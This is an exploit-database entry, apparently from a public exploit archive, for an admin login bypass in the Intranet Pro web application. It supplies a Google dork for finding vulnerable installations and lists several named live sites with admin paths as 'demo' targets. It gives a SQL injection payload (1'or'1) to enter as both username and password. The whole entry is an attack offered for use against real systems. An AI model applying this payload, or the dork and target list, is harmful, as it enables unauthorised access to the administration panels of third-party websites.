id: 18082
date: 04/20/2012
title: Intranet Pro Bypass Vulnerability
author: Microsoft-Dz
cves: 

# Exploit Title: [Bypass Intranet Pro]
# Date: [2012-04-19]
# Author: [Microsoft-Dz]
# Vendor or Software Link: [http://www.intranet-pro.com/]
# Version: [All version]
# Category:: [webapps]
# Google dork: [intext:- Service proposé par Intranet-Pro.com -]
# Tested on: [Lunix]
# Demo site: [www.clubqualite35.fr/admin/ - genetic-distribution.com/admin/ - www.portail-plus.fr/js/admin/ - http://www.tvhdm.com/admin/]
# Exploit : 
#|Login: 1'or'1
#|Pass: 1'or'1
#Find Admin : www.xxx.fr/admin/ 



#  0day.today [2023-03-22]  #